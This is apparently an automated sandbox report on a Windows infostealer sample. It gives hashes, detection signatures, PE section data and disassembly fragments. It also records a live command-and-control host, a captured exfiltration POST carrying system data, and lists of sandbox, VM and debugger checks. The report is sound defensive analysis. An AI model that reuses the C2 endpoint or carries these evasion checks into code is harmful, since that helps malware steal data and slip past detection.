Edit tour

Windows Analysis Report
EMasovlyrQ.exe

Overview

General Information

Sample name:	EMasovlyrQ.exe renamed because original name is a hash value
Original sample name:	04869f7ace61605035664af9589af21b.exe
Analysis ID:	1578943
MD5:	04869f7ace61605035664af9589af21b
SHA1:	0688d7e4038f6103600011198edecb98df152221
SHA256:	957a5b78c870c0c648884b8ee30f5f437325c94212f4436566cccbc3b88aa987
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Hides threads from debuggers

Infostealer behavior detected

Leaks process information

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to create an SMB header

Detected potential crypto function

Entry point lies outside standard sections

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

EMasovlyrQ.exe (PID: 4676 cmdline: "C:\Users\user\Desktop\EMasovlyrQ.exe" MD5: 04869F7ACE61605035664AF9589AF21B)

cleanup

HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 501024Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 32 31 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2

Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: EMasovlyrQ.exe, 00000000.00000002.2256563870.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: EMasovlyrQ.exe, EMasovlyrQ.exe, 00000000.00000003.2249729977.0000000001C66000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2249445122.0000000001C54000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000002.2256899743.0000000001C67000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2249545943.0000000001C61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: EMasovlyrQ.exe, 00000000.00000003.2250038040.0000000001BF2000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000003.2250500496.0000000001BF7000.00000004.00000020.00020000.00000000.sdmp, EMasovlyrQ.exe, 00000000.00000002.2256563870.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: EMasovlyrQ.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: EMasovlyrQ.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: EMasovlyrQ.exe, EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: EMasovlyrQ.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

System Summary

PE file contains section with special chars

Source: EMasovlyrQ.exe	Static PE information: section name:
Source: EMasovlyrQ.exe	Static PE information: section name: .idata
Source: EMasovlyrQ.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C73E55	0_3_01C73E55
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C73E55	0_3_01C73E55
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C73E55	0_3_01C73E55
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C73E55	0_3_01C73E55
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C6EFBD	0_3_01C6EFBD
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009805B0	0_2_009805B0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00986FA0	0_2_00986FA0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A3B180	0_2_00A3B180
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009AF100	0_2_009AF100
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A400E0	0_2_00A400E0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CFE030	0_2_00CFE030
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009D6210	0_2_009D6210
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A3C320	0_2_00A3C320
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A40420	0_2_00A40420
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CC4410	0_2_00CC4410
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_0097E620	0_2_0097E620
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CF4780	0_2_00CF4780
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009DA7F0	0_2_009DA7F0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A3C770	0_2_00A3C770
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CD6730	0_2_00CD6730
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A2C900	0_2_00A2C900
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00984940	0_2_00984940
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_0097A960	0_2_0097A960
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00C2AAC0	0_2_00C2AAC0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00B46AC0	0_2_00B46AC0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_0097CBB0	0_2_0097CBB0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CE8BF0	0_2_00CE8BF0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00B04B60	0_2_00B04B60
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00C2AB2C	0_2_00C2AB2C
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CFCC70	0_2_00CFCC70
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CECD80	0_2_00CECD80
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CF4D40	0_2_00CF4D40
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00C8AE30	0_2_00C8AE30
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A3EF90	0_2_00A3EF90
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A38F90	0_2_00A38F90
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CC2F90	0_2_00CC2F90
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00994F70	0_2_00994F70
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009810E6	0_2_009810E6
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CDD430	0_2_00CDD430
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CE35B0	0_2_00CE35B0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CC56D0	0_2_00CC56D0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00D01780	0_2_00D01780
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A29880	0_2_00A29880
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CC9920	0_2_00CC9920
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CF3A70	0_2_00CF3A70
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CE1BD0	0_2_00CE1BD0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009B1BE0	0_2_009B1BE0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CD7CC0	0_2_00CD7CC0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00C29C80	0_2_00C29C80
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00985DB0	0_2_00985DB0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00995EB0	0_2_00995EB0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00983ED0	0_2_00983ED0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CF9FE0	0_2_00CF9FE0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C75426	0_3_01C75426
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C74EF0	0_3_01C74EF0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C74EF0	0_3_01C74EF0
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C75426	0_3_01C75426

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 009B5340 appears 50 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 009775A0 appears 698 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 009B4FD0 appears 289 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 00B27220 appears 96 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 009B4F40 appears 337 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 0097C960 appears 37 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 009773F0 appears 111 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 0098CCD0 appears 54 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 0097CAA0 appears 64 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 009771E0 appears 47 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 0098CD40 appears 80 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 00B4CBC0 appears 104 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 009B50A0 appears 101 times
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: String function: 00A544A0 appears 76 times

Source: EMasovlyrQ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: EMasovlyrQ.exe

Static PE information: Section: yxuskcgf ZLIB complexity 0.994499260590819

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Code function: 0_2_0097255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_0097255D

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Code function: 0_2_009729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,

0_2_009729FF

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: EMasovlyrQ.exe

ReversingLabs: Detection: 52%

Source: EMasovlyrQ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: EMasovlyrQ.exe	String found in binary or memory: Unable to complete request for channel-process-startup

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: EMasovlyrQ.exe

Static file information: File size 4460032 > 1048576

Source: EMasovlyrQ.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: EMasovlyrQ.exe	Static PE information: Raw size of yxuskcgf is bigger than: 0x100000 < 0x1b9200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\EMasovlyrQ.exe

Unpacked PE file: 0.2.EMasovlyrQ.exe.970000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yxuskcgf:EW;pwerqsbo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yxuskcgf:EW;pwerqsbo:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: EMasovlyrQ.exe

Static PE information: real checksum: 0x450502 should be: 0x445f65

Source: EMasovlyrQ.exe	Static PE information: section name:
Source: EMasovlyrQ.exe	Static PE information: section name: .idata
Source: EMasovlyrQ.exe	Static PE information: section name:
Source: EMasovlyrQ.exe	Static PE information: section name: yxuskcgf
Source: EMasovlyrQ.exe	Static PE information: section name: pwerqsbo
Source: EMasovlyrQ.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C5EACD push edi; ret	0_3_01C5EFDA
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C5D5D0 push eax; ret	0_3_01C5D5D1
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C5D782 push ecx; iretd	0_3_01C5D83A
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C10A60 push edx; retf	0_3_01C10AE9
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C5EACD push edi; ret	0_3_01C5EFDA
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C5D5D0 push eax; ret	0_3_01C5D5D1
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_3_01C5D782 push ecx; iretd	0_3_01C5D83A
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CF41D0 push eax; mov dword ptr [esp], edx	0_2_00CF41D5
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009F2340 push eax; mov dword ptr [esp], 00000000h	0_2_009F2343
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00A2C7F0 push eax; mov dword ptr [esp], 00000000h	0_2_00A2C743
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009B0AC0 push eax; mov dword ptr [esp], 00000000h	0_2_009B0AC4
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009D1430 push eax; mov dword ptr [esp], 00000000h	0_2_009D1433
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009F39A0 push eax; mov dword ptr [esp], 00000000h	0_2_009F39A3
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_009CDAD0 push eax; mov dword ptr [esp], edx	0_2_009CDAD1
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Code function: 0_2_00CF9F40 push dword ptr [eax+04h]; ret	0_2_00CF9F6F

Source: EMasovlyrQ.exe

Static PE information: section name: yxuskcgf entropy: 7.955898878885769

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	Window searched: window name: Regmonclass	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WINDBG.EXE
Source: EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: EMasovlyrQ.exe, 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmp, EMasovlyrQ.exe, 00000000.00000003.2162395634.00000000077AF000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1104B15 second address: 1104B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
